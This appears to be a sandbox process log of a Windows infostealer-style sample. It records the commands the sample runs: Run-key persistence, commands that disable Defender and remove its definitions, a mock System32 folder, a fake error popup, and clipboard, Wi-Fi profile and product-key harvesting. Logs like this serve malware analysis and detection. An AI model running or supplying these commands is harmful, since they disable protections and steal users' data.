C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D25E.tmp\D25F.tmp\D260.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DA6D.tmp\DA6E.tmp\DA6F.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E25C.tmp\E25D.tmp\E25E.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe" & rd /s /q "C:\ProgramData\5XBAIMGLN7QI" & exit
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E9FD.tmp\E9FE.tmp\E9FF.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F20C.tmp\F20D.tmp\F20E.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F98E.tmp\F98F.tmp\F990.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\14E.tmp\14F.tmp\150.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\93D.tmp\93E.tmp\93F.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\112D.tmp\112E.tmp\112F.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\18ED.tmp\18EE.tmp\18EF.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\20CD.tmp\20CE.tmp\20CF.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\287D.tmp\287E.tmp\288F.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\300F.tmp\3010.tmp\3011.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\382D.tmp\382E.tmp\382F.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c mkdir "\\?\C:\Windows \System32"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3FCE.tmp\3FCF.tmp\3FD0.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c start "" "C:\Windows \System32\printui.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
C:\Windows \System32\printui.exe
"C:\Windows \System32\printui.exe"
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\478E.tmp\478F.tmp\4790.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
